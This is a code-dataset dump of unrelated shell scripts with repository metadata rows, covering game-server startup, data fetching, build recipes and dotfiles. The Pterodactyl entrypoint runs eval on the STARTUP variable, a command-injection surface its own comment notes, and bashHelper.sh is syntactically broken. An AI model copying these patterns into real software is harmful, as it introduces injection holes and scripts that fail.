8b100ff18c2d8060a3c698b2f010454df50c4e6c | Shell | Rephot/pterodactyl-images | /games/entrypoint.sh | UTF-8 | 1,443 | 3.5 | 4 | [
"MIT"
] | permissive | #!/bin/bash
cd /home/container
sleep 1

# Make internal Docker IP address available to processes.
export INTERNAL_IP=`ip route get 1 | awk '{print $NF;exit}'`

# Update Source Server
# NOTE(review): SRCDS_APPID / SRCDS_BETAID / SRCDS_BETAPASS are presumably
# injected by the Pterodactyl panel; the unquoted [ ! -z ${VAR} ] tests only
# work by accident when the variable is unset - confirm and quote upstream.
if [ ! -z ${SRCDS_APPID} ]; then
    if [ ! -z ${SRCDS_BETAID} ]; then
        if [ ! -z ${SRCDS_BETAPASS} ]; then
            ./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} -beta ${SRCDS_BETAID} -betapassword ${SRCDS_BETAPASS} +quit
        else
            ./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} -beta ${SRCDS_BETAID} +quit
        fi
    else
        ./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} +quit
    fi
fi
cd /home/container/csgo

# Install Sourcemod/metamod
# Triggered by a SOURCE_FLAG marker file or the SOURCEMOD env variable.
if [ -f SOURCE_FLAG ] || [ "${SOURCEMOD}" = 1 ]; then
    echo "Updating Sourcemod/metamod..."
    curl -L -o sourcemod.tar.gz "https://sourcemod.net/latest.php?os=linux&version=1.10" -o metamod.tar.gz "https://sourcemm.net/latest.php?os=linux&version=1.11"
    tar -xf sourcemod.tar.gz
    tar -xf metamod.tar.gz
    rm sourcemod.tar.gz metamod.tar.gz
    echo "Done updating Sourcemod/metamod!"
fi

cd /home/container

# Replace Startup Variables
# Rewrites {{VAR}} placeholders in STARTUP to ${VAR} and expands them.
# NOTE(review): the eval-of-eval pattern executes whatever STARTUP contains;
# it is trusted panel input here, but treat it as a command-injection
# surface if STARTUP can ever be user-controlled.
MODIFIED_STARTUP=`eval echo $(echo ${STARTUP} | sed -e 's/{{/${/g' -e 's/}}/}/g')`
echo ":/home/container$ ${MODIFIED_STARTUP}"

# Run the Server
eval ${MODIFIED_STARTUP}
| true |
13a886a560b2da9fffc30cc9a558aef4d90eacc9 | Shell | tbbrown/GradientDistortionUnwarpOnly | /CheckForGdcFiles.sh | UTF-8 | 2,200 | 4.625 | 5 | [] | no_license | #!/bin/bash
#
# Function description
# Show usage information for this script
#
# Print a short usage synopsis (blank-line padded) to stdout.
usage() {
	local script_name
	script_name="$(basename "${0}")"
	printf '\n  Usage: %s --checkdir=<check-dir>\n\n' "${script_name}"
}
#
# Function description
# Get the command line options for this script
#
# Global output variables
# ${checkdir} - directory to check
#
# Parse the command line and publish the result in the global ${checkdir}.
# Exits (status 1) on --help, on an unrecognized option, or when
# --checkdir=<dir> is missing.
get_options() {
	local scriptName=$(basename ${0})
	local arguments=($@)

	# initialize global output variables
	unset checkdir

	# parse arguments
	local index=0
	local numArgs=${#arguments[@]}
	local argument

	while [ ${index} -lt ${numArgs} ]; do
		argument=${arguments[index]}

		case ${argument} in
			--help)
				usage
				exit 1
				;;
			--checkdir=*)
				# strip everything up to (and including) the last '='
				checkdir=${argument/*=/""}
				index=$(( index + 1 ))
				;;
			*)
				usage
				echo "ERROR: Unrecognized Option: ${argument}"
				exit 1
				;;
		esac
	done

	# check required parameters
	if [ -z ${checkdir} ]; then
		usage
		echo "ERROR: <check-dir> not specified"
		exit 1
	fi

	# report
	echo "-- ${scriptName}: Specified command-line options - Start --"
	echo "   checkdir: ${checkdir}"
	echo "-- ${scriptName}: Specified command-line options - End --"
}
#
# Main processing
#
main() {
	# Verify that every non-GDC NIfTI image under <check-dir> has a
	# gradient-distortion-corrected twin (<name>_gdc.nii.gz); print a
	# FAILURE line for each missing one and a summary at the end.
	get_options "$@"

	# Bug fix: scriptName was local to usage/get_options, so the report
	# headers below used to print an empty name.
	local scriptName
	scriptName=$(basename "${0}")

	local filesCheckedCount=0
	local failuresCount=0
	local image_file image_file_base gdc_file

	# Iterate the find output line-by-line instead of word-splitting it,
	# so paths containing spaces survive.  (Assumes no newlines in paths.)
	while IFS= read -r image_file; do
		[ -n "${image_file}" ] || continue
		filesCheckedCount=$(( filesCheckedCount + 1 ))
		image_file_base=${image_file%.nii.gz}
		gdc_file=${image_file_base}_gdc.nii.gz
		if [ ! -f "${gdc_file}" ]; then
			echo "FAILURE: ${gdc_file} should exist but does not"
			failuresCount=$(( failuresCount + 1 ))
		fi
	done < <(find "${checkdir}" -name "*.nii.gz" | grep --invert-match "_gdc")

	echo "-- ${scriptName}: Results - Start --"
	echo "   filesCheckedCount: ${filesCheckedCount}"
	echo "   failuresCount: ${failuresCount}"
	echo "-- ${scriptName}: Results - End --"
}
# Invoke the main function, forwarding all arguments as separate words
# (unquoted $@ would re-split arguments containing spaces).
main "$@"
| true |
600ce902049c4104337b2b0f3d6bb04ece6677f5 | Shell | velociraptor014/Scripts | /BASH/theconditionofdeath.sh | UTF-8 | 620 | 3.59375 | 4 | [] | no_license | #!/bin/sh
# Interactive IF-FI demo (French prompts kept verbatim).
echo "Ce script étudie l'usage des conditions IF-FI"
echo "---------------------------------------------"
echo "Alors, nous allons prendre un exemple :"
# -------------------------------------------------
echo "Choisissezentre 'on', 'off' et 'middle'" > /dev/null
echo "Choisissez entre 'on', 'off' et 'middle'"
read -r DEATH
echo "You have choosen $DEATH"
echo PLEASE
sleep 1
echo WAIT
sleep 3
# - - - - - - - - - - - - - - - - - - - - - - - - -
# Quote "$DEATH": the original unquoted tests produced a syntax error on
# empty or multi-word input instead of reaching the else branch.
if [ "$DEATH" = off ]; then
    echo "Il est mort"
elif [ "$DEATH" = on ]; then
    echo "Il est vivant"
elif [ "$DEATH" = middle ]; then
    echo "Il est quelque chose mais je ne sais pas quoi !"
else
    # typo fix: was "incorrectesh"
    echo "Réponse incorrecte"
fi
| true |
22d5362580e1481bea3fa1c4f3b02cf8aff1371d | Shell | itga/mip-microservices-infrastructure | /demo/frontend/portal/run.sh | UTF-8 | 416 | 2.796875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"MIT",
"AGPL-3.0-only"
] | permissive | #!/bin/bash
set -e

# Source trees to mirror into the build context; overridable via env.
META_DB_PROJECT=${META_DB_PROJECT:-~/Workspace/GitLab/mip-private/meta-db}
SCIENCE_DB_PROJECT=${SCIENCE_DB_PROJECT:-~/Workspace/GitLab/mip-private/adni-merge-db}

# Mirror (with deletion) both projects, excluding VCS and placeholder files.
rsync -ar --delete --exclude=".keep" --exclude=".git" "$META_DB_PROJECT/" src/meta-db/
rsync -ar --delete --exclude=".keep" --exclude=".git" "$SCIENCE_DB_PROJECT/" src/science-db/

# [ -z "$@" ] misbehaves when several arguments are given; test the count.
if [ $# -eq 0 ]; then
    vagrant up
else
    # Forward all arguments verbatim (quoted, so spaces survive).
    vagrant "$@"
fi
| true |
5523fa672adf0e8977b1a2bc96dde16f9ab49423 | Shell | FSMaxB/lfs-me-repos | /blfs-7.5/dmenu-4.5 | UTF-8 | 515 | 3.046875 | 3 | [] | no_license | #!/bin/bash
# lfs-me package recipe for the suckless dmenu launcher.
pkgname=dmenu
pkgver=4.5
pkgver_postfix=
sources=( "http://dl.suckless.org/tools/${pkgname}-${pkgver}.tar.gz" )
sha1sums=( '70c1a13b950b7b0cb1bc35e30c6e861a78359953' )
# Unpack the source archive into the build dir and enter it.
# NOTE(review): sources_dir/build_dir come from the lfs-me framework.
lfs_me_prepare() {
	tar -xf "${sources_dir}/${pkgname}-${pkgver}.tar.gz" -C "$build_dir"
	cd "${build_dir}/${pkgname}-${pkgver}"
}
# Build against the X.Org headers/libraries under XORG_PREFIX.
lfs_me_build() {
	make X11INC="${XORG_PREFIX}/include" X11LIB="${XORG_PREFIX}/lib"
}
# dmenu ships no test suite; the check phase is a deliberate no-op
# that succeeds (status 0) and prints nothing.
lfs_me_check() {
	:
}
# Stage the install into the fakeroot dir for later packaging.
lfs_me_install() {
	make PREFIX=/usr DESTDIR="$fakeroot_dir" install
}
| true |
ece0508e976f79ac3e09db3b151003de687b7bdb | Shell | BenjaminAbdi/NNVoiceActivityDetector | /bash_scripts/oggToWav.sh | UTF-8 | 275 | 3.375 | 3 | [] | no_license | search_dir="./"
folder="./output/"
base_name="fable"
cpt=0
for filename in `ls $search_dir`; do
filename_without_ext="${filename%.*}"
let cpt=cpt+1
if [[ $filename == *".ogg"* ]]
then
#echo $filename "sound-"$cpt".wav"
sox $filename -c 1 "sound-"$cpt".wav"
fi
done
| true |
8b06401ed396c9f33640d90e8cd3c061b58bd244 | Shell | mug31416/PubAdmin-Discourse | /src/SEGmodel/sensitivityRandCondModelRuns.sh | UTF-8 | 1,058 | 2.625 | 3 | [] | no_license | #!/usr/bin/env bash
# Sensitivity sweep: train the conditional random-baseline model over every
# feature set x label combination, appending result tails to a summary log.
export F=2001
export H=101
export mt="cond_rand"
export mt1="cond_svm"
date > log.summary_${mt}.txt
echo ${mt} >> log.summary_${mt}.txt
for feat in wlf_f4bert_head wlf_head bert_head wlf_bert_head f7bert_head; do
  for l in CHANGE_IN_RULE NO_CHANGE_IN_RULE; do
    python -u trainModel.py --train_file ../../data4Modeling/SecPassageClassification/trainDockets_2019-0430.jsonl --test_file ../../data4Modeling/SecPassageClassification/testDockets_2019-0430.jsonl --head_feat_qty $H --feat_qty $F --feat_cache_dir ../../data4Modeling/SecPassageClassification/${feat}_${F}_${H} --label ${l} --use_nodseq_model --filter_all --use_prior --model_file ${feat}_${F}_${H}/${mt1}_${feat}_${l}  2>&1|tee log.${mt}_${feat}_${l}.txt ;
  done;
  # Last 13 lines of each run log hold the metrics block being summarized.
  echo NO_CHANGE_IN_RULE ${feat} >> log.summary_${mt}.txt ;
  tail -n 13 log.${mt}_${feat}_NO_CHANGE_IN_RULE.txt >> log.summary_${mt}.txt ;
  echo CHANGE_IN_RULE ${feat} >> log.summary_${mt}.txt ;
  tail -n 13 log.${mt}_${feat}_CHANGE_IN_RULE.txt >> log.summary_${mt}.txt ;
done
| true |
20368272af022572c33e8b69287a9c8ace4d31f4 | Shell | tanelpak/skriptimine | /praks9/yl2 | UTF-8 | 250 | 2.671875 | 3 | [] | no_license | #!/bin/bash
#
# shape
# Draw an r-row figure: each row prints its row number followed by t stars.
# Extracted into a function so the drawing logic is testable, and so empty or
# missing input no longer triggers a bash arithmetic syntax error (the
# original expanded the unquoted $r/$t directly inside (( ... ))).
draw_grid() {
    local rows=$1
    local stars=$2
    local i j
    # Referencing rows/stars by name inside (( )) treats empty input as 0.
    for (( i = 1; i <= rows; i++ )); do
        echo -n "$i"
        for (( j = 1; j <= stars; j++ )); do
            echo -n "*"
        done
        echo ""
    done
}
echo -n "Sisesta ridade arv: "
read -r r
echo -n "Sisesta tärnide arv read: "
read -r t
draw_grid "$r" "$t"
#
# end of script
#
| true |
a2d6f211930629c68209abdb18f1b5f6556f9070 | Shell | ikhaliq42/GridCellModel | /manuscripts/pnas/SI_text/src/copy_to_dropbox.sh | UTF-8 | 239 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# Publish the compiled SI-text artefacts into the shared Dropbox folder.
target=~/Dropbox/Independent_grids_and_gamma/noise/
# Whitespace-separated list of files to publish (word-split on purpose below).
files="
SI_text.pdf
"
# Announce what is being copied, then show the destination's current contents.
echo "Copying to main figures to dropbox..."
echo $files
echo
ls $target
# Copy each artefact verbosely; -r keeps this working for directories too.
for doc in $files; do
    cp -rv $doc $target
done
| true |
7a0391287dbbaf6e422b330b41cfeae3383e47c0 | Shell | jamyspex/dotfiles | /.aliases.sh | UTF-8 | 1,321 | 3.390625 | 3 | [] | no_license | # If fasd is installed and in use, add a bunch of
# aliases for it.
# (fasd tracks recently used files/directories and offers quick jumps.)
if command -v fasd >/dev/null 2>&1; then
# Any
alias a='fasd -a'
# Show/search/select
alias s='fasd -si'
# Directory
alias d='fasd -d'
# File
alias f='fasd -f'
# Interactive directory selection
alias sd='fasd -sid'
# Interactive file selection
alias sf='fasd -sif'
# cd - same functionality as j in autojump
alias z='fasd_cd -d'
# Interactive cd
alias zz='fasd_cd -d -i'
# Vim
alias v='fasd -f -e vim'
fi
# Prefer Neovim everywhere when it is installed.
if command -v nvim > /dev/null 2>&1; then
alias n=nvim
alias vi=nvim
alias vim=nvim
fi
# Helper: does the named command exist? (type also matches aliases/functions.)
_has() {
type $1>/dev/null 2>&1
}
# Safe delete
# Ensure the fallback trash directory exists before rm is disabled below.
if [ ! -d ~/.trash ]; then
mkdir ~/.trash
fi
# Disable raw rm in interactive use; `del` below is the safe replacement.
alias rm='echo "rm disabled! Use del for safe delete"'
# Use the desktop trash via gio when available, else move into ~/.trash.
if _has gio; then
del(){
gio trash "$@"
}
else
del(){
mv "$@" ~/.trash
}
fi
alias jupyter-notebook="~/.local/bin/jupyter-notebook --no-browser"
# More ls aliases.
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Replace 'ls' with exa if it is available.
# NOTE(review): these exa aliases override the ll/la/l definitions above.
if command -v exa > /dev/null 2>&1; then
alias ls="exa --git"
alias ll="exa --all --long --git"
alias la="exa --all --binary --group --header --long --git"
alias l="exa --git"
fi
alias t='tmux attach'
| true |
19bd809441364df4fd77e3483e616eb0579b2777 | Shell | AsherBond/cato | /tools/tag_release_and_bump.sh | UTF-8 | 593 | 4.0625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -x
## this script is to be run in a local git repo only
# Re-point the 'latest' and <version> tags at HEAD, record the version in the
# repo-root VERSION file, and push everything. Deleting possibly-missing tags
# is deliberately best-effort, so there is no `set -e` here.
version=$1
if [ "$version" = "" ] ; then
echo "usage: $0 <version>"
exit 1
fi
# Fix: $(...) instead of backticks; quote all $version/$REPO_HOME expansions
# so unusual version strings or repo paths with spaces cannot split words.
REPO_HOME=$(git rev-parse --show-toplevel)
# 'latest' version
git tag -d latest
git push origin :refs/tags/latest
# supplied version
git tag -d "$version"
git push origin ":refs/tags/$version"
git pull
echo "$version" > "$REPO_HOME/VERSION"
git add "$REPO_HOME/VERSION"
git commit -m "Bumped Version to [$version]."
git push
git tag -a latest -m "Version $version"
git tag -a "$version" -m "Version $version"
git push --tags --force
| true |
ba6a2e20860090e805c2a2680ad30322582feeda | Shell | 24HOURSMEDIA/docker-dxstack1-synced | /docker/php-fpm/start.sh | UTF-8 | 360 | 2.828125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env sh
# Prepare the php-fpm extra-config directory inside the shared volume, seed it
# with a templated www.conf.example on first start, then run php-fpm in the
# foreground (it becomes the container's main process).
export DX_PHPFPM_EXTRA_CONF_DIR="$DX_VOLUME_ETC/php-fpm.d"
mkdir -p "$DX_PHPFPM_EXTRA_CONF_DIR"
# copy example file to extra conf dir if not exist
# Fix: inverted the test to drop the placeholder `echo ""` then-branch (which
# only printed a stray blank line) and removed the useless `cat` pipe.
if [ ! -f "$DX_PHPFPM_EXTRA_CONF_DIR/www.conf.example" ]; then
    # Render environment placeholders into the example config on first run.
    ./parse_env.sh < ./php-fpm/etc/php-fpm.d/www.conf.example > "$DX_PHPFPM_EXTRA_CONF_DIR/www.conf.example"
fi
php-fpm
| true |
eb4549e5d204a5964c400e3a56dda8ed4c37c6b9 | Shell | Azkali/BananaPi | /BananaCreator/bashHelper.sh | UTF-8 | 654 | 2.78125 | 3 | [] | no_license | #!/usr/bin/env bash
wget -q -O - https://apt.mopidy.com/mopidy.gpg | sudo apt-key add -
&& sudo wget -q -O /etc/apt/sources.list.d/mopidy.list https://apt.mopidy.com/stretch.list
&& wget https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/adafruit-pitft.sh
&& curl https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/retrogame.sh >retrogame.sh
&& sudo apt-get update && sudo apt-get upgrade && sudo apt-get install python3-dev python3-pip python-dev python-pip python-PIL python-imaging -y
&& pip install Mopidy-Iris
if [$? -eq 0]; then
echo OK
sudo python3 ./Installer.py
else
echo FAIL
fi | true |
39c777b7c034378e78b6c4194deedc8ecac4ba9d | Shell | SettRaziel/wrf_archlinux | /wrf_run/data_fetch/gfs_fetch.sh | UTF-8 | 3,381 | 3.953125 | 4 | [
"Zlib",
"JasPer-2.0",
"Libpng",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
# This script loads the required input data for a 180 h forecast run
# ${1} matches the required date yyyymmdd
# ${2} matches the required timestamp
# ${3} is the storage path
# ${4} is the model resolution [0p25, 0p50, 1p00]
# ${5} the time period for the model run
# define terminal colors
# COLOR_PATH must point to a sourceable file defining RED/NC; INFO_LOG (used
# throughout) is likewise expected from the environment -- TODO confirm both.
. "${COLOR_PATH}"
# parent url to the noaa data server as of 2020-06-01
# source: https://www.nco.ncep.noaa.gov/pmb/products/gfs/#GFS
GFS_URL="https://nomads.ncep.noaa.gov/pub/data/nccf/com/gfs/prod/"
# function to fetch the input data with curl
# Download each 3-hourly GRIB2 file over HTTPS with up to 10 resume retries.
# Args: $1 date yyyymmdd, $2 run hour, $3 storage path, $4 resolution, $5 period (h).
gfs_fetch_curl () {
# Define a number of retries and try to download the files
for i in $(seq -f %03g 0 3 "${5}"); do
RETRIES=0
while [ "${RETRIES}" -lt 10 ]; do
# -w return http code, -C continue if interrupted, -o define output; loop breaks if file was loaded successfully
RETURN_CODE=$(curl -w "%{http_code}\n" -C - -o "${3}"/gfs.t"${2}"z.pgrb2."${4}".f"${i}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}")
if [[ "${RETURN_CODE}" -eq 200 ]]; then
break
fi
((RETRIES++))
# in addition to the http codes curl returns 000 if it ran into a timeout
if [[ "${RETURN_CODE}" =~ [4-5][0-9]{2}$ ]] || [[ "${RETURN_CODE}" =~ [0]{3}$ ]]; then
if [[ "${RETURN_CODE}" =~ [0]{3}$ ]]; then
RETURN_CODE="Timeout"
fi
# Bug fix: %d chokes on zero-padded forecast hours such as 008/009 (bash
# printf reads them as invalid octal numbers); print the hour string with %s.
printf "Inputfile for %s failed with %s at %s.\\n" "${i}" "${RETURN_CODE}" "$(date +"%T")" >> "${INFO_LOG}"
fi
done
if [[ "${RETRIES}" -eq 10 ]]; then
printf "Error while downloading %s at %s.\\n" "${i}" "$(date +"%T")" >> "${INFO_LOG}"
exit 1
fi
done
}
# function to fetch the input data with wget
# wget-based fallback: the first pass downloads every 3-hourly file quietly,
# the second pass re-runs with -c to resume and complete any broken downloads.
gfs_fetch_wget () {
local fc_hour target
for fc_hour in $(seq -f %03g 0 3 "${5}"); do
target="${GFS_URL}gfs.${1}/${2}/atmos/gfs.t${2}z.pgrb2.${4}.f${fc_hour}"
wget -q -P "${3}" "${target}"
done
for fc_hour in $(seq -f %03g 0 3 "${5}"); do
target="${GFS_URL}gfs.${1}/${2}/atmos/gfs.t${2}z.pgrb2.${4}.f${fc_hour}"
wget -c -q -P "${3}" "${target}"
done
}
# backup function to fetch the input data from the ftp server with curl
# FTP fallback fetch with up to 10 resume retries per forecast file.
# Same arguments as gfs_fetch_curl; overwrites the global GFS_URL on purpose.
gfs_ftp_fetch_curl () {
GFS_URL="ftp://ftp.ncep.noaa.gov/pub/data/nccf/com/gfs/prod/"
# Define a number of retries and try to download the files
for i in $(seq -f %03g 0 3 "${5}"); do
RETRIES=0
while [ "${RETRIES}" -lt 10 ]; do
# -f fail silently, -C continue if interrupted, -o define output; loop breaks if file was loaded successfully
curl -f -C - -o "${3}"/gfs.t"${2}"z.pgrb2."${4}".f"${i}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}" && break
((RETRIES++))
done
if [[ "${RETRIES}" -eq 10 ]]; then
# Bug fix: corrected the "downlaoding" typo, and %d -> %s because bash printf
# rejects zero-padded hours like 008/009 as invalid octal numbers.
printf "Error while downloading %s at %s.\\n" "${i}" "$(date +"%T")" >> "${INFO_LOG}"
exit 1
fi
done
}
# error handling for input parameter
if [ "$#" -ne 5 ]; then
printf "%bWrong number of arguments. Must be one for <DATE> <TIMESTAMP> <STORAGE_PATH> <GEO_RESOLUTION> <PERIOD>.%b\\n" "${RED}" "${NC}"
exit 1
fi
# logging time stamp
printf "Starting gfs data fetch by removing old files at %s.\\n" "$(date +"%T")" >> "${INFO_LOG}"
# Remove old gfs files
rm "${3}"/gfs.*
printf "Starting gfs data fetching at %s.\\n" "$(date +"%T")" >> "${INFO_LOG}"
# use fetch via curl at this point
gfs_fetch_curl "${1}" "${2}" "${3}" "${4}" "${5}"
| true |
e07004b38bb110091b5b1cad7ef95bc7aba91385 | Shell | jiaedu/student | /sh/setup-named-chroot.sh | UTF-8 | 1,969 | 4.1875 | 4 | [] | no_license | #!/bin/bash
# Whitespace-separated list of host config files/dirs to bind-mount into the
# BIND chroot. Entries that do not exist on the host are skipped at run time.
ROOTDIR_MOUNT='/etc/localtime /etc/named /etc/pki/dnssec-keys /etc/named.root.key /etc/named.conf
/etc/named.dnssec.keys /etc/named.rfc1912.zones /etc/rndc.conf /etc/rndc.key
/usr/lib64/bind /usr/lib/bind /etc/named.iscdlv.key /run/named /var/named
/etc/protocols /etc/services'
usage()
{
echo
echo 'This script setups chroot environment for BIND'
echo 'Usage: setup-named-chroot.sh ROOTDIR [on|off]'
}
# Require exactly two arguments: the chroot root and the on/off action.
if ! [ "$#" -eq 2 ]; then
echo 'Wrong number of arguments'
usage
exit 1
fi
ROOTDIR="$1"
# Exit if ROOTDIR doesn't exist
if ! [ -d "$ROOTDIR" ]; then
echo "Root directory $ROOTDIR doesn't exist"
usage
exit 1
fi
# Bind-mount every existing ROOTDIR_MOUNT entry into the chroot.
# Files are only mounted over missing/empty targets; directories only over
# empty targets -- so locally modified chroot copies are never shadowed.
mount_chroot_conf()
{
if [ -n "$ROOTDIR" ]; then
for all in $ROOTDIR_MOUNT; do
# Skip nonexistant files
[ -e "$all" ] || continue
# If mount source is a file
if ! [ -d "$all" ]; then
# mount it only if it is not present in chroot or it is empty
if ! [ -e "$ROOTDIR$all" ] || [ `stat -c'%s' "$ROOTDIR$all"` -eq 0 ]; then
touch "$ROOTDIR$all"
mount --bind "$all" "$ROOTDIR$all"
fi
else
# Mount source is a directory. Mount it only if directory in chroot is
# empty.
if [ -e "$all" ] && [ `ls -1A $ROOTDIR$all | wc -l` -eq 0 ]; then
mount --bind --make-private "$all" "$ROOTDIR$all"
fi
fi
done
fi
}
# Undo mount_chroot_conf: unmount each bind target and delete the empty
# placeholder files that were touch(1)ed before mounting.
umount_chroot_conf()
{
if [ -n "$ROOTDIR" ]; then
for all in $ROOTDIR_MOUNT; do
# Check if file is mount target. Do not use /proc/mounts because detecting
# of modified mounted files can fail.
if mount | grep -q '.* on '"$ROOTDIR$all"' .*'; then
umount "$ROOTDIR$all"
# Remove temporary created files
[ -f "$all" ] && rm -f "$ROOTDIR$all"
fi
done
fi
}
# Dispatch on the second argument.
case "$2" in
on)
mount_chroot_conf
;;
off)
umount_chroot_conf
;;
*)
echo 'Second argument has to be "on" or "off"'
usage
exit 1
esac
exit 0
| true |
6b73ecc65243e851794300339ae107b22350c38f | Shell | mike-sandler/git_hooks | /.git_hooks/tests/pre-commit_docs_test.bash | UTF-8 | 827 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
# shunit2 test for the "docs" pre-commit hook: committing a version of a Ruby
# file that removes class/method documentation must be declined with counts.
USE_HOOKS="docs"
. test_helper
# Fixture: a documented class (\n sequences expanded later via echo -e).
documented_code="
# class A description\n
class A\n
# method doc\n
def meth; end\n\n
# method doc\n
def meth2; end\n
end\n "
# Fixture: the same class with all documentation stripped.
undocumented_code="
class A\n
def meth; end\n
def meth2; end\n
end\n "
test_decline_documentation(){
mkdir lib
echo -e $documented_code > ./lib/a.rb
git add ./lib/a.rb
git commit -m 'documented commit' > /dev/null
# Overwrite with the undocumented version and attempt a second commit;
# `git ci` is assumed to be an alias for commit -- TODO confirm in test_helper.
echo -e $undocumented_code > ./lib/a.rb
git add ./lib/a.rb
output=$(git ci -m 'undocumented commit' 2>&1) #> /dev/null
assertTrue "echo '${output}' | grep 'You removed documentation for 1 classes'"
assertTrue "echo '${output}' | grep 'You removed documentation for 2 methods'"
assertTrue "echo '${output}' | grep 'You decline documentation'"
}
. ./shunit2
| true |
4e088c2076dce6fcdc35932258eaf567fbd0b3d0 | Shell | fermi-lat/rootUtil | /apps/TRY | UTF-8 | 421 | 2.75 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env sh
# Build the cel tools, then run cel$1.exe against test.cel.root, sandwiched
# between celInspect.exe runs. The inspection steps are skipped for the
# Convert/Inspect tools, which are themselves the conversion/inspection step.
clear
cmd="cel$1.exe"
cd ../cmt
make || exit
. setup.sh
cd ../apps
export PATH=../${CMTCONFIG}:${PATH}
# Bug fix: quote "$1" (the old unquoted test broke with no argument) and
# replace the deprecated, ambiguous `-a` with two tests joined by &&.
if [ "$1" != "Convert" ] && [ "$1" != "Inspect" ] ; then
celInspect.exe test.cel.root
echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
fi
$cmd test.cel.root
if [ "$1" != "Convert" ] && [ "$1" != "Inspect" ] ; then
celInspect.exe test.cel.root
echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
fi
| true |
c405a822a8a6d120074a023716adca1ea57e8a80 | Shell | yzotov/centos7-cuda-spark-daemon | /wait-spark.sh | UTF-8 | 909 | 3.3125 | 3 | [] | no_license | #!/usr/bin/env bash
# Block until a previously started Spark daemon has terminated.
# Usage mirrors spark-daemon.sh: wait-spark.sh <command> <instance>.
sbin="`dirname "$0"`"
sbin="`cd "$sbin"; pwd`"
. "$sbin/spark-config.sh"
# get arguments
command=$1
shift
instance=$1
shift
. "$SPARK_PREFIX/bin/load-spark-env.sh"
if [ "$SPARK_IDENT_STRING" = "" ]; then
export SPARK_IDENT_STRING="$USER"
fi
export SPARK_PRINT_LAUNCH_COMMAND="1"
# get log directory
if [ "$SPARK_LOG_DIR" = "" ]; then
export SPARK_LOG_DIR="$SPARK_HOME/logs"
fi
if [ "$SPARK_PID_DIR" = "" ]; then
SPARK_PID_DIR=/tmp
fi
# some variables
# log is computed for parity with spark-daemon.sh but is not used below.
log="$SPARK_LOG_DIR/spark-$SPARK_IDENT_STRING-$command-$instance-$HOSTNAME.out"
pid="$SPARK_PID_DIR/spark-$SPARK_IDENT_STRING-$command-$instance.pid"
# Set default scheduling priority
if [ "$SPARK_NICENESS" = "" ]; then
export SPARK_NICENESS=0
fi
# Poll once per second until the PID from the pidfile is gone.
# kill -0 only checks process existence/permission; it sends no signal.
if [ -f $pid ]; then
TARGET_PID=`cat $pid`
while kill -0 $TARGET_PID > /dev/null 2>&1; do
echo "Waiting of spark process $TARGET_PID..."
sleep 1;
done
fi
| true |
db94d793619593acb94e4fa5476fe7f98a0e2dad | Shell | cwonrails/dotfiles | /trusty/.bashrc | UTF-8 | 4,216 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Interactive bash configuration: prompt, editor, completion, dev toolchains
# (Go, Ruby via chruby, terraform, hub), and ls/grep conveniences.
# Enables distinguishing between Mac (Darwin) and Linux
export PLATFORM=$(uname -s)
# Set command prompt options
PS1="\n\u @\h [\d \@]\n\w "
# Enable command prompt coloring
export CLICOLOR=1
# Set vim as default editor
export EDITOR='vim'
# Enable vi mode in shell
set -o vi
# Enable bash aliases if present
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable bash completion in interactive shells
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
# Enable chruby
source /usr/local/share/chruby/chruby.sh
chruby ruby 2.3.0
# Golang env variables
export GOPATH=$HOME/go
export GOBIN=$GOPATH/bin
# export PATH=$GOPATH/bin:$PATH
export PATH=$PATH:/usr/local/go/bin
export PATH=/usr/local/bin:$PATH
export PATH=/usr/local/sbin:$PATH
# Enable terraform
PATH=/usr/local/terraform/bin:$HOME/terraform:$PATH
# Enable hub: https://github.com/github/hub
eval "$(hub alias -s)"
. /home/cwonlinux/hub/etc/hub.bash_completion.sh
# Enable thefuck: https://github.com/nvbn/thefuck
alias fuck='$(thefuck $(fc -ln -1))'
# Add tab completion for SSH hostnames based on ~/.ssh/config, ignoring wildcards
[ -e "$HOME/.ssh/config" ] && complete -o "default" -o "nospace" -W "$(grep "^Host" ~/.ssh/config | grep -v "[?*]" | cut -d " " -f2- | tr ' ' '\n')" scp sftp ssh;
# Add `~/bin` to the `$PATH`
export PATH="$HOME/bin:$PATH";
# Load the shell dotfiles, and then some:
# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{path,bash_prompt,exports,aliases,functions,extra}; do
[ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
# Enable tab completion for `g` by marking it as an alias for `git`
if type _git &> /dev/null && [ -f /usr/local/etc/bash_completion.d/git-completion.bash ]; then
complete -o default -o nospace -F _git g;
fi;
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob;
# Append to the Bash history file, rather than overwriting it
shopt -s histappend;
# Autocorrect typos in path names when using `cd`
shopt -s cdspell;
# Use correct grep
# NOTE(review): this alias is immediately overridden by the colored alias
# below, so the /bin/grep pin never takes effect -- confirm intent.
alias grep="/bin/grep"
# Always enable colored grep output
